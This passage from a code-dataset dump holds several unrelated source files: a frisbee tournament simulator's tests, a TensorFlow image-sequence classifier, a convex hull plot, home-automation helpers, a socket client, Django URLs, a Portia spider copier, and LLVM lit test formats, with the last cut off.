nickname=\"UGMO\")\nprint(ucla.name, ucla.nickname, ucla.rating, ucla.games_list)\nprint(ucsb.name, ucsb.nickname, ucsb.rating, ucsb.games_list)\nprint(ucsd.name, ucsd.nickname, ucsd.rating, ucsd.games_list)\nprint(cal.name, cal.nickname, cal.rating, cal.games_list)\n\n\n#\n# Tests for Game class\n#\nucla = Team(name=\"UCLA\", rating=2200, nickname=\"Smaug\", games_list=[])\nucsb = Team(name=\"UCSB\", rating=2000, nickname=\"Black Tide\")\nucsd = Team(name=\"UCSD\", rating=1700, nickname=\"Air Squids\")\ncal = Team(name=\"Cal\", rating=1500, nickname=\"UGMO\")\n\n# Game 0\nprint(\"\\nGame 0 (method='random')\")\nucla_vs_ucsb = Game(ucla, ucsb)\nucla_vs_ucsb.play_game(method=\"random\")\nprint(\"Score *should* be only 15-13 or 13-15.\")\n\n\n# Game 1\nprint(\"\\nGame 1\")\nucla_vs_ucsb = Game(ucla, ucsb)\nucla_vs_ucsb.play_game(\n method=\"double negative binomial\",\n rating_diff_to_victory_margin=mens_rating_diff_to_victory_margin,\n p_a_offense=p_a_offense,\n)\n\n\n# Game 2\nprint(\"\\nGame 2\")\nwinner_vs_ucsd = Game(None, ucsd, child_a=ucla_vs_ucsb)\n\nwinner_vs_ucsd.play_game(\n method=\"double negative binomial\",\n rating_diff_to_victory_margin=mens_rating_diff_to_victory_margin,\n p_a_offense=p_a_offense,\n)\n\n\n# Tournament 0\nprint(\"\\nTournament 0\")\nsemi1 = Game(ucla, ucsb, level=\"semi\")\nsemi2 = Game(cal, ucsd, level=\"semi\")\nfinals = Game(None, None, semi1, semi2, level=\"final\")\n\nfinals.play_game(\n method=\"double negative binomial\",\n rating_diff_to_victory_margin=mens_rating_diff_to_victory_margin,\n p_a_offense=p_a_offense,\n)\n\n\n# Tests for playing 8 team bracket\nprint(\"\\nEight team bracket\")\nucla = Team(name=\"UCLA\", rating=2200, nickname=\"Smaug\", games_list=[])\nucsb = Team(name=\"UCSB\", rating=2100, nickname=\"Black Tide\")\nucsd = Team(name=\"UCSD\", rating=2000, nickname=\"Air Squids\")\ncal = Team(name=\"Cal\", rating=1900, nickname=\"UGMO\")\nuw = Team(name=\"UW\", rating=1800, nickname=\"Sundodgers\")\nore = Team(name=\"Oregon\", rating=1700, nickname=\"Ego\")\nwhit = Team(name=\"Whitman\", rating=1600, nickname=\"Sweets\")\nslo = Team(name=\"CalPolySLO\", rating=1500, nickname=\"Slocore\")\n\nteams_list = [ucla, ucsb, ucsd, cal, uw, ore, whit, slo]\n\nplacement = play_eight_team_single_elimination_bracket(\n teams_list,\n method=\"double negative binomial\",\n rating_diff_to_victory_margin=mens_rating_diff_to_victory_margin,\n 
p_a_offense=p_a_offense,\n)\n\nprint(placement[0][1].name)\n\n\n# Tests for playing 12-team 1-bid tournament\nprint(\"\\n\\nTest for playing 12-team 1-bid\")\nuw = Team(name=\"UW\", rating=2400, nickname=\"Sundodgers\")\nore = Team(name=\"Oregon\", rating=2300, nickname=\"Ego\")\nslo = Team(name=\"CalPolySLO\", rating=2250, nickname=\"Slocore\")\nucla = Team(name=\"UCLA\", rating=2200, nickname=\"Smaug\", games_list=[])\nstan = Team(name=\"Stanford\", rating=2150, nickname=\"Bloodthirsty\")\nucsb = Team(name=\"UCSB\", rating=2100, nickname=\"Black Tide\")\nucsd = Team(name=\"UCSD\", rating=2000, nickname=\"Air Squids\")\ncal = Team(name=\"Cal\", rating=1900, nickname=\"UGMO\")\nwhit = Team(name=\"Whitman\", rating=1600, nickname=\"Sweets\")\nsdsu = Team(name=\"SDSU\", rating=1400, nickname=\"\")\norst = Team(name=\"Oregon State\", rating=1300, nickname=\"?\")\nwwu = Team(name=\"Western Washington\", rating=1200, nickname=\"Dirt\")\n\nteams_list = [uw, ore, slo, ucla, stan, ucsb, ucsd, cal, whit, sdsu, orst, wwu]\n\nplacement = play_twelve_team_tournament(\n teams_list,\n num_bids=1,\n method=\"double negative binomial\",\n rating_diff_to_victory_margin=mens_rating_diff_to_victory_margin,\n p_a_offense=p_a_offense,\n)\n\nprint(placement[0][1].name)\n\n\n# Import rankings and regions and sections and ratings\n# Get USAU Ratings and rankings\n\nwomens_ranking_html = r\"Rankings/USAU_team_rankings.women.2020-03-11.html\"\nmens_ranking_html = r\"Rankings/USAU_team_rankings.men.2020-03-11.html\"\n\n# Use pandas html reader to extract dataframe\nresult = pd.read_html(womens_ranking_html)\ndf_women = result[0]\n\nresult = pd.read_html(mens_ranking_html)\ndf_men = result[0]\n\n# Last row contains garbage, so remove it.\ndf_women = df_women.drop(index=len(df_women) - 1)\ndf_men = df_men.drop(index=len(df_men) - 1)\n\n# Convert numeric columns to from string/object to correct type\ncols = [\"Rank\", \"Power Rating\", \"Wins\", \"Losses\"]\ndf_women[cols] = df_women[cols].apply(pd.to_numeric)\ndf_men[cols] = df_men[cols].apply(pd.to_numeric)\n\n\ndef simulate_regionals(\n df,\n region,\n division=\"Division I\",\n num_participants=12,\n num_bids=1,\n method=\"double negative binomial\",\n rating_diff_to_victory_margin=mens_rating_diff_to_victory_margin,\n p_a_offense=p_a_offense,\n):\n df_teams = get_top_teams_from_region(\n df, region, n=num_participants, division=division\n )\n teams_list = create_teams_from_dataframe(df_teams)\n print(region)\n print(f\"Teams list: {teams_list}\")\n if num_participants == 12:\n placement = play_twelve_team_tournament(\n teams_list,\n num_bids=num_bids,\n method=method,\n rating_diff_to_victory_margin=rating_diff_to_victory_margin,\n p_a_offense=p_a_offense,\n )\n else:\n raise Exception(\n \"Sorry! 
Nothing here yet besides a twelve team single bid bracket!\"\n )\n\n return placement\n\n\n#\n# Simulate Men's Northwest Regionals\n#\n\nprint(\"\\n\\nNorthwest Regionals (Men)\\n\")\n# Get top men's team from the northwest\ndf_teams = get_top_teams_from_region(df_men, \"Northwest\", n=12, division=\"Division I\")\nteams_list = create_teams_from_dataframe(df_teams)\nplacement = play_twelve_team_tournament(\n teams_list,\n num_bids=1,\n method=\"double negative binomial\",\n rating_diff_to_victory_margin=mens_rating_diff_to_victory_margin,\n p_a_offense=p_a_offense,\n)\nprint(placement[0][1].name)\n\n\n#\n# Simulate every men's regionals\n#\n\nregions = sorted(list(set(df_men[\"College Region\"].dropna().to_list())))\n\nfor region in regions:\n print(f\"\\n\\n{region}\\n\")\n placement = simulate_regionals(\n df_men,\n region,\n division=\"Division I\",\n num_participants=12,\n num_bids=1,\n method=\"double negative binomial\",\n rating_diff_to_victory_margin=mens_rating_diff_to_victory_margin,\n p_a_offense=p_a_offense,\n )\n\n print(\"\\n\", placement[0][1].name)\n","sub_path":"test_ultimate.py","file_name":"test_ultimate.py","file_ext":"py","file_size_in_byte":7216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"22655010","text":"import numpy as np\nimport tensorflow as tf\nimport pandas as pd\nimport cv2\n\nfrom mpi4py import MPI\n\nfrom model import feature_extractor\nfrom utils import sparse_cost_sensitive_loss,onehot,weighted_ce\n\n\nfrom keras.applications.mobilenet_v2 import MobileNetV2\nfrom keras.applications.imagenet_utils import preprocess_input\n\n# from feature_extractor import Feature_extractor\n\n\ndef cv_resize_pad(img,desired_size):\n osize = img.shape[:2]\n ratio = float(desired_size)/max(osize)\n nsize = tuple([int(x*ratio) for x in osize])\n \n img = cv2.resize(img, (nsize[1],nsize[0]))\n dw = desired_size - nsize[1]\n dh = desired_size - nsize[0]\n\n top,bottom = dh//2,dh-(dh//2)\n left,right = dw//2,dw-(dw//2)\n\n color = [0,0,0]\n return cv2.copyMakeBorder(img,top,bottom,left,right,cv2.BORDER_CONSTANT,value=color)\n\ndef load_images(data_dir,resize=None,seq_len=None):\n data_desc = pd.read_csv(data_dir+\"labelsImgPath.csv\",sep=\",\")\n img_list = []\n shapes = []\n for i in data_desc['filename']:\n img_raw = cv2.imread(data_dir+i,cv2.IMREAD_COLOR)\n \n img_list.append(img_raw)\n shapes.append((img_raw.shape[0],img_raw.shape[1]))\n\n\n shapes = np.array(shapes)\n if(resize==None):\n resize = np.int8((np.mean(shapes[:,0])+np.mean(shapes[:,1]))/2.0)\n res_imgs = []\n for img in img_list:\n nimg = cv_resize_pad(img,resize)\n # More augmentation \n res_imgs.append(nimg)\n\n images = np.array(res_imgs)\n \n g_images,labels = generate_seqs(images,data_desc)\n g_images = tf.keras.preprocessing.sequence.pad_sequences(g_images,maxlen=seq_len,dtype='float32')\n return g_images,labels\n\ndef generate_seqs(images,data_desc,onehot_lab=True):\n idx = []\n runn_idx = 0\n img_seqs = []\n labels = []\n label = None\n tid = 0 \n for _,row in data_desc.iterrows():\n if(tid != row['trackid']):\n if(len(idx)!=0):\n idx = list(map(lambda x: x+runn_idx,idx))\n img_seqs.append(np.array(images[idx]))\n labels.append(label)\n runn_idx = runn_idx + len(idx)\n \n tid = row['trackid']\n idx = [row['framenr']-2] #TODO\n else:\n idx.append(row['framenr']-2)\n label = row['class']\n if(onehot_lab):\n labels = onehot(labels,label_dict={'boat':1,'nature':0})\n return img_seqs,labels\n\ndef fourier_transform(data,only_real=True):\n fft_data = np.fft.rfftn(data,axes=(1,2,3))\n fft_data = (fft_data - np.mean(fft_data))/np.std(fft_data)\n if(only_real):\n fft_data = np.real(fft_data)\n return fft_data\n\ndef surf_extract(img):\n #surf = cv2.xfeatures2d.SURF_create(400)\n #kp, des = surf.detectAndCompute(img, None)\n return None\n\n\n\n\nif __name__ == '__main__':\n import argparse\n parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument('--dir', type=str, default=\"C:/Users/Elias/Desktop/DB19/Hackathon/MultiFrame_propolsTrackingClassification/\") \n\n args = parser.parse_args()\n data_dir = args.__dict__['dir']\n train_dir = data_dir +'train/'\n test_dir = data_dir +'test/'\n train_imgs,train_labels = load_images(train_dir,resize=96,seq_len=5)\n test_imgs,test_labels = load_images(test_dir,resize=train_imgs.shape[2],seq_len=train_imgs.shape[1])\n # additional_train_imgs = np.repeat(train_imgs[:122,:],4,axis=0)\n # additional_train_labels = np.repeat(train_labels[:122,:],4,axis=0)\n\n # train_imgs = np.concatenate((train_imgs,additional_train_imgs),axis=0)\n # train_labels = np.concatenate((train_labels,additional_train_labels),axis=0)\n surfer_boy,boys = surf_extract(train_imgs[0,0,:])\n # Fourier transform\n fft_train = 
fourier_transform(train_imgs)\n # PCA??\n\n\n # Random cnn features\n\n # Sift\n\n\n resnet = MobileNetV2(weights='imagenet',pooling = max, include_top = False,input_shape=train_imgs.shape[2:])\n \n reshaped_imgs = np.reshape(train_imgs,(-1,)+train_imgs.shape[2:])\n reshaped_t_imgs = np.reshape(test_imgs,(-1,)+train_imgs.shape[2:])\n\n train_imgs_pp = preprocess_input(reshaped_imgs)\n test_imgs_pp = preprocess_input(reshaped_t_imgs)\n \n train_imgs_feat = resnet.predict(train_imgs_pp)\n test_imgs_feat = resnet.predict(test_imgs_pp)\n \n train_imgs_feat = np.reshape(train_imgs_feat,(train_imgs.shape[:2]+train_imgs_feat.shape[1:]))\n test_imgs_feat = np.reshape(test_imgs_feat,(test_imgs.shape[:2]+test_imgs_feat.shape[1:]))\n\n train_dataset = tf.data.Dataset.from_tensor_slices((train_imgs_feat,train_labels))\n test_dataset = tf.data.Dataset.from_tensor_slices((test_imgs_feat,test_labels))\n n_epochs = 200\n batchsize = 50\n n_samples = train_imgs.shape[0]\n \n train_dataset = train_dataset.shuffle(buffer_size=100,reshuffle_each_iteration=True).batch(batchsize).repeat()\n test_dataset = test_dataset.shuffle(buffer_size=100,reshuffle_each_iteration=True).batch(batchsize)\n\n iterator = tf.data.Iterator.from_structure(train_dataset.output_types,train_dataset.output_shapes)\n next_element = iterator.get_next()\n\n train_iterator = iterator.make_initializer(train_dataset)\n test_iterator = iterator.make_initializer(test_dataset)\n\n ft_extr = feature_extractor()\n\n # abandoned as well:\n #model = ft_extr.create_lstm_model(next_element[0])\n model = ft_extr.small_model(next_element[0])\n #model = ft_extr.create_3dconv_model(next_element[0])\n \n #loss = weighted_ce(next_element[1],model,.1)\n \n # abandoned approaches\n loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=model,labels=next_element[1]))\n #loss = sparse_cost_sensitive_loss(model,next_element[1],[[1.,1.],[1.,1.]]) #TODO label to onehot\n \n prediction = tf.nn.softmax(model)\n cnf_matrix = tf.math.confusion_matrix(predictions=tf.to_float(tf.argmax(prediction,1)),labels=tf.to_float(tf.argmax(next_element[1], 1)))\n equality = tf.equal(tf.to_float(tf.argmax(prediction,1)), tf.to_float(tf.argmax(next_element[1], 1))) \n accuracy = tf.reduce_mean(tf.to_float(equality))\n\n update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n with tf.control_dependencies(update_ops):\n optimizer = tf.train.AdamOptimizer(learning_rate=.001).minimize(loss)\n \n\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n sess.run(train_iterator)\n saver = tf.train.Saver()\n\n for epoch in range(n_epochs):\n ep_loss = []\n ep_cnf = []\n for _ in range(int(n_samples/batchsize)):\n _,b_loss,cnf_mat = sess.run([optimizer,loss,cnf_matrix],feed_dict={'is_training:0':True})\n ep_loss.append(b_loss)\n ep_cnf.append(cnf_mat)\n\n print(np.mean(ep_loss))\n print(np.mean(ep_cnf,axis=0))\n if(n_epochs%10==0):\n save_path = saver.save(sess,data_dir+str(epoch)+\"_checkpoint.ckpt\")\n \n print('predicting..')\n save_path = saver.save(sess,data_dir+\"final_checkpoint.ckpt\")\n sess.run(test_iterator)\n result_set = []\n try:\n while True:\n pred = sess.run(prediction,feed_dict={'is_training:0':False})\n result_set.append(pred)\n except:\n pass\n # range\n # sess.run(optimizer,cost)\n # training is false and true sometimes\n \n # save_path = saver.save(sess, \"path.ckpt\")\n # saver.restore(sess, \"path.ckpt\")\n\n result_set = np.vstack(np.array(result_set))\n np.savetxt(data_dir+\"preds.csv\", result_set, delimiter=\",\")\n 
print(\"done\")\n \n \n \n \n \n\n \n\n \n \n \n \n #for i in img_list:\n\n \n\n \n \n #cv2.cvtColor(csv_dir)\n\n # with tf.Session() as sess:\n # asf = Feature_extractor()\n # comm = MPI.COMM_WORLD\n # rank = comm.Get_rank() # debatable wether i want to think about mpi now..., maybe if it works, put in the effort to make it run on mpi","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":8024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"488587524","text":"\n'''dataarray = objectmaker.run()\nprint(len(dataarray))\na = [i[0] for i in dataarray]\nb = [i[1] for i in dataarray]\nc = [i[2] for i in dataarray]\n\n\nx = np.array(a)\ny = np.array(b)\nz = np.array(c)'''\n\n\n\nimport numpy as np\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.pyplot as plt\nfrom scipy.spatial import ConvexHull \nimport objectmaker \n\nfig = plt.figure()\nax = fig.add_subplot(111, projection='3d')\ndataarray = objectmaker.run()\n\n\npoints= np.array(dataarray)\n\nhull=ConvexHull(points)\n\n\nx = [i[0] for i in points]\ny = [i[1] for i in points]\nz = [i[2] for i in points]\nedges= [x,y,z]\n\n\nfor i in hull.simplices:\n plt.plot(points[i,0], points[i,1], points[i,2], 'r-')\n\nax.plot(edges[0],edges[1],edges[2],'bo') \n\nax.set_xlabel('x')\nax.set_ylabel('y')\nax.set_zlabel('z')\n\n\n\nplt.show()\nprint(edges)\n","sub_path":"construction/ConvexHull.py","file_name":"ConvexHull.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"421506186","text":"\"\"\"\nHelper functions.\n\"\"\"\nimport json\n\n\ndef binary_state(value):\n \"\"\"Return a binary for the state of binary sensors\"\"\"\n if value == 'on' or value == True:\n return 1.0\n elif value == 'off' or value == False:\n return 0.0\n else:\n return float('nan')\n\n\ndef ensure_list(*args):\n \"\"\"\n Check if a list is passed, if not convert args to a list.\n\n Parameters\n ----------\n args : single entity or list of entities\n The entities of interest.\n\n Returns\n -------\n list\n A list of entities.\n \"\"\"\n entities = []\n for arg in args:\n if isinstance(arg, list):\n entities += arg\n else:\n entities.append(arg)\n return entities\n\n\ndef isfloat(value):\n \"\"\"\n Check if string can be parsed to a float.\n \"\"\"\n try:\n float(value)\n return True\n except ValueError:\n return False\n\n\ndef is_weekday(dtObj):\n \"\"\"Check a datetime object dtObj is a weekday\"\"\"\n if dtObj.weekday() < 5:\n return True\n else:\n return False\n\n\ndef time_category(dtObj):\n \"\"\"Return a time category, bed, home, work, given a dtObj.\"\"\"\n if 9 <= dtObj.hour <= 17:\n return 'daytime'\n elif 5 <= dtObj.hour < 9:\n return 'morning'\n elif 17 < dtObj.hour < 23:\n return 'evening'\n else:\n return 'night'\n\n\ndef load_url(filename):\n \"\"\"Convenience for loading a url from a json file.\"\"\"\n try:\n with open(filename, 'r') as fp:\n url = json.load(fp)\n except Exception as e:\n print('Failed to load url')\n url = None\n return url['url']\n","sub_path":"detective/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":1622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"5740064","text":"import socket\nimport time\n\nclass Client():\n\n def __init__(self, host, port):\n self.host = host\n self.port = port\n self.connected = True\n self.sock = None\n\n def connect(self):\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n server_address = (self.host, self.port) \n self.sock.connect(server_address) \n print(\"connecting to %s (%s) with %s\" % (self.host, self.port, server_address))\n\n def sendJsonData(self, data):\n print(\"grec\")\n while self.connected:\n try:\n print(\"Connection on {}\".format(port))\n self.sock.send(data)\n self.connected = False\n except Exception as e:\n print(e)\n self.connected = False\n\n print(\"Close\")\n self.sock.close()\n\n #def sendData(data):\n # while continuer:\n # try:\n\t#\t\t #player.play(sock.recv(2048))\n\t#\t data = sock.recv(4096)\n\t#\t if(data == b'CLOSE'):\n\t#\t\t continuer = False\n\t#\t else:\n\t#\t\t player.play(data)\t\t\n\t# except Exception as e:\n\t#\t print(e)\n\t#\t continuer = False\n\n # sock.close()\n # player.closeAudioPlayerStream()\n","sub_path":"src/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"320385285","text":"#coding=utf-8\r\nfrom django.conf.urls import patterns, include, url\r\nfrom django.conf import settings\r\n\r\nurlpatterns = patterns('example',\r\n\r\n (r'^template/$','views.template',),\r\n (r'^sites/$','views.sites',),\r\n (r'^set/$','views.set',),\r\n (r'^registration/$','views.registration',),\r\n (r'^reexamine/$','views.reexamine',),\r\n (r'^information/$','views.information',),\r\n (r'^examine/$','views.examine',),\r\n (r'^catalog/$','views.catalog',),\r\n (r'^admission/$','views.admission',),\r\n)","sub_path":"example/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"63144789","text":"from __future__ import absolute_import\nimport os\nimport json\nimport six\n\n\nclass CopyError(Exception):\n pass\n\n\nclass SpiderCopier(object):\n \"\"\"\n Utility for copying spiders and items from one project to another.\n\n :source: read data from source project in read_file\n :destination: read and write to destination project in read_file and\n save_files\n \"\"\"\n def __init__(self, source, destination):\n self.source = source\n self.source_files = set(self.list_files(source))\n self.destination = destination\n self.destination_files = set(self.list_files(destination))\n\n def _spider_path(self, spider):\n return 'spiders/%s.json' % spider\n\n def copy(self, spiders, items=None):\n \"\"\"\n Copies the provided spiders and items from the source project to the\n destination project. If spiders have name collisions the copied spider\n will be renamed. In the event of item name collisions a merge will be\n attempted.\n\n :list spiders: List of spiders to copy from the source to the\n destination\n :list items: optional: List of items to copy that may not be scraped\n by the provided spiders\n raises CopyError\n \"\"\"\n if items is None:\n items = []\n spider_paths = set(self._spider_path(s) for s in spiders)\n self._check_missing(spider_paths)\n templates = self._load_templates(spiders)\n combined_items, renamed_items = \\\n self._build_combined_items(templates, items)\n spider_data, renamed_spiders = self._load_spiders(spider_paths)\n templates = self._update_templates(templates, renamed_items,\n renamed_spiders)\n extractors = self._build_combined_extractors(templates)\n self._save_data({\n 'items.json': combined_items,\n 'extractors.json': extractors,\n 'spiders': spider_data,\n 'templates': templates,\n })\n return self._build_summary(spider_paths, items,\n renamed_spiders, renamed_items)\n\n def _refresh_destination_files(self):\n self.destination_files = set(self.list_files(self.destination))\n\n def _check_missing(self, spider_paths):\n \"\"\"\n Check if any of the provided spiders don't exist.\n \"\"\"\n missing = spider_paths - self.source_files\n if missing:\n raise CopyError('Unable to copy spiders as the following spiders '\n 'do not exist in the source project: \"%s\"' %\n '\", \"'.join(missing))\n\n def _load_templates(self, spiders):\n templates = {}\n template_startswith = ['spiders/%s/' % spider for spider in spiders]\n for file_path in self.source_files:\n if any(file_path.startswith(ts) for ts in template_startswith):\n templates[file_path] = self.read_file(self.source, file_path)\n return templates\n\n def _update_templates(self, templates, renamed_items, renamed_spiders):\n \"\"\"\n Handle renamed items during copy.\n \"\"\"\n updated_templates = {}\n for file_path, template in templates.items():\n scrapes = template['scrapes']\n if scrapes in renamed_items:\n template['scrapes'] = renamed_items[scrapes]\n\n spider = file_path.split('/')[1]\n if spider in renamed_spiders:\n template_name = file_path.split('/')[-1]\n spider = renamed_spiders[spider]\n file_path = os.path.join('spiders', spider, template_name)\n updated_templates[file_path] = template\n\n return updated_templates\n\n def _load_spiders(self, spider_paths):\n spiders = {p: self.read_file(self.source, p) for p in spider_paths}\n renamed_spiders = {}\n for spider_path in spiders.keys():\n if spider_path in self.destination_files:\n spider_name = spider_path[8:-5]\n moved_spider = self._rename(spider_name,\n self.destination_files)\n self._refresh_destination_files()\n 
spiders[moved_spider] = spiders.pop(spider_path)\n if spider_name != moved_spider:\n renamed_spiders[spider_name] = moved_spider[8:-5]\n\n return spiders, renamed_spiders\n\n def _rename(self, name, dest_values, base='spiders/%s_%s%s.json'):\n new_name = base % (name, 'copy', '')\n start = 1\n while new_name in dest_values:\n new_name = base % (name, 'copy', start)\n start += 1\n return new_name\n\n def _build_combined_items(self, templates, items):\n \"\"\"\n Compare items from both source and destination. Merge compatible files,\n copy files that exist in the source and not the destination,\n rename incompatible files.\n \"\"\"\n source_items = self.read_file(self.source, 'items.json')\n dest_items = self.read_file(self.destination, 'items.json')\n renamed_items = {}\n copy_items = set(t['scrapes'] for t in templates.values()\n if 'scrapes' in t)\n for item in items:\n copy_items.add(item)\n for name, item in source_items.items():\n if name not in copy_items:\n continue\n if name in dest_items:\n new_name, item = self._merge_items(name, item,\n dest_items[name],\n list(dest_items.keys()))\n if new_name != name:\n renamed_items[name] = new_name\n name = new_name\n dest_items[name] = item\n return dest_items, renamed_items\n\n def _merge_items(self, name, source, dest, existing):\n source_fields = set(source['fields'])\n dest_fields = set(dest['fields'])\n intersection = source_fields & dest_fields\n if intersection:\n for field in intersection:\n s_field = source['fields'].get(field)\n d_field = dest['fields'].get(field)\n if s_field is None:\n continue\n elif d_field is None and s_field['required']:\n return self._rename(name, existing, '%s_%s%s'), source\n if any(s_field[p] != d_field[p] for p in ('required', 'type')):\n return self._rename(name, existing, '%s_%s%s'), source\n for field in source_fields - dest_fields:\n dest['fields'][field] = source['fields'][field]\n return name, dest\n\n def _build_combined_extractors(self, templates):\n \"\"\"\n Take all extractors needed by the spiders that are being copied and\n add them to the extractors at the destination\n \"\"\"\n source_extractors = self.read_file(self.source, 'extractors.json')\n dest_extractors = self.read_file(self.destination, 'extractors.json')\n for spider in templates.values():\n for extractor in spider.get('extractors', []):\n if (extractor in source_extractors and\n extractor not in dest_extractors):\n dest_extractors[extractor] = source_extractors[extractor]\n return dest_extractors\n\n def _build_summary(self, spider_paths, items, renamed_spiders,\n renamed_items):\n \"\"\"\n Build a summary of copied spiders and items\n \"\"\"\n spiders = [sp[8:-5] for sp in spider_paths]\n items = list(set(items) | set(renamed_items.keys()))\n return {\n 'copied_spiders': spiders,\n 'renamed_spiders': renamed_spiders,\n 'copied_items': items,\n 'renamed_items': renamed_items,\n }\n\n def _save_data(self, data):\n files_data = {}\n for path in data.keys():\n if isinstance(path, six.text_type):\n path = path.encode('utf-8')\n if path.endswith('.json'):\n files_data[path] = json.dumps(data.pop(path),\n sort_keys=True, indent=4)\n else:\n sub_directories = data.pop(path)\n for path in sub_directories.keys():\n if isinstance(path, six.text_type):\n path = path.encode('utf-8')\n files_data[path] = json.dumps(sub_directories.pop(path),\n sort_keys=True, indent=4)\n self.save_files(self.destination, files_data)\n\n def read_file(self, location, filename):\n raise NotImplementedError\n\n def list_files(self, location):\n raise 
NotImplementedError\n\n def save_files(self, location, files):\n raise NotImplementedError\n\n\nclass FileSystemSpiderCopier(SpiderCopier):\n def __init__(self, source, destination, base_dir='.'):\n self.base_dir = os.path.join(base_dir, '')\n super(FileSystemSpiderCopier, self).__init__(source, destination)\n\n def read_file(self, location, filename):\n with open(os.path.join(self.base_dir, location, filename), 'r') as f:\n return json.loads(f.read())\n\n def list_files(self, location):\n file_paths = []\n project_dir = os.path.join(self.base_dir, location)\n for dir, _, files in os.walk(project_dir):\n dir = dir.split(project_dir)[1]\n dir = dir[1:] if dir.startswith(os.path.sep) else dir\n for filename in files:\n if filename.endswith('.json'):\n file_paths.append(os.path.join(dir, filename))\n return file_paths\n\n def save_files(self, location, files):\n for filename, data in files.items():\n file_path = os.path.join(self.base_dir, location, filename)\n with open(file_path, 'w') as f:\n f.write(data)\n\n\nclass GitSpiderCopier(SpiderCopier):\n\n def __init__(self, source, destination, branch):\n self.branch = branch\n super(GitSpiderCopier, self).__init__(source, destination)\n\n def read_file(self, location, filename):\n f = location.file_contents_for_branch(filename, self.branch)\n if f:\n return json.loads(f)\n else:\n return {}\n\n def list_files(self, location):\n try:\n return location.list_files_for_branch(self.branch)\n except KeyError:\n return location.list_files_for_branch('master')\n\n def save_files(self, location, files):\n return location.save_files(files, self.branch)\n","sub_path":"slyd/slyd/utils/copy.py","file_name":"copy.py","file_ext":"py","file_size_in_byte":10718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"604382118","text":"from __future__ import absolute_import\nimport os\n\nimport lit.Test\nimport lit.util\n\n\nclass TestFormat(object):\n def getTestsForPath(self, testSuite, path_in_suite, litConfig, localConfig):\n \"\"\"\n Given the path to a test in the test suite, generates the Lit tests associated\n to that path. There can be zero, one or more tests. For example, some testing\n formats allow expanding a single path in the test suite into multiple Lit tests\n (e.g. they are generated on the fly).\n \"\"\"\n yield lit.Test.Test(testSuite, path_in_suite, localConfig)\n\n###\n\n\nclass FileBasedTest(TestFormat):\n def getTestsForPath(self, testSuite, path_in_suite, litConfig, localConfig):\n \"\"\"\n Expand each path in a test suite to a Lit test using that path and assuming\n it is a file containing the test. File extensions excluded by the configuration\n or not contained in the allowed extensions are ignored.\n \"\"\"\n filename = path_in_suite[-1]\n\n # Ignore dot files and excluded tests.\n if filename.startswith(\".\") or filename in localConfig.excludes:\n return\n\n base, ext = os.path.splitext(filename)\n if ext in localConfig.suffixes:\n yield lit.Test.Test(testSuite, path_in_suite, localConfig)\n\n def getTestsInDirectory(self, testSuite, path_in_suite, litConfig, localConfig):\n source_path = testSuite.getSourcePath(path_in_suite)\n for filename in os.listdir(source_path):\n filepath = os.path.join(source_path, filename)\n if not os.path.isdir(filepath):\n for t in self.getTestsForPath(testSuite, path_in_suite + (filename,), litConfig, localConfig):\n yield t\n\n\n###\n\nimport re\nimport tempfile\n\n\nclass OneCommandPerFileTest(TestFormat):\n # FIXME: Refactor into generic test for running some command on a directory\n # of inputs.\n\n def __init__(self, command, dir, recursive=False, pattern=\".*\", useTempInput=False):\n if isinstance(command, str):\n self.command = [command]\n else:\n self.command = list(command)\n if dir is not None:\n dir = str(dir)\n self.dir = dir\n self.recursive = bool(recursive)\n self.pattern = re.compile(pattern)\n self.useTempInput = useTempInput\n\n def getTestsInDirectory(self, testSuite, path_in_suite, litConfig, localConfig):\n dir = self.dir\n if dir is None:\n dir = testSuite.getSourcePath(path_in_suite)\n\n for dirname, subdirs, filenames in os.walk(dir):\n if not self.recursive:\n subdirs[:] = []\n\n subdirs[:] = [\n d for d in subdirs if (d != \".svn\" and d not in localConfig.excludes)\n ]\n\n for filename in filenames:\n if (\n filename.startswith(\".\")\n or not self.pattern.match(filename)\n or filename in localConfig.excludes\n ):\n continue\n\n path = os.path.join(dirname, filename)\n suffix = path[len(dir) :]\n if suffix.startswith(os.sep):\n suffix = suffix[1:]\n test = lit.Test.Test(\n testSuite, path_in_suite + tuple(suffix.split(os.sep)), localConfig\n )\n # FIXME: Hack?\n test.source_path = path\n yield test\n\n def createTempInput(self, tmp, test):\n raise NotImplementedError(\"This is an abstract method.\")\n\n def execute(self, test, litConfig):\n if test.config.unsupported:\n return (lit.Test.UNSUPPORTED, \"Test is unsupported\")\n\n cmd = list(self.command)\n\n # If using temp input, create a temporary file and hand it to the\n # subclass.\n if self.useTempInput:\n tmp = tempfile.NamedTemporaryFile(suffix=\".cpp\")\n self.createTempInput(tmp, test)\n tmp.flush()\n cmd.append(tmp.name)\n elif hasattr(test, \"source_path\"):\n cmd.append(test.source_path)\n else:\n cmd.append(test.getSourcePath())\n\n out, 
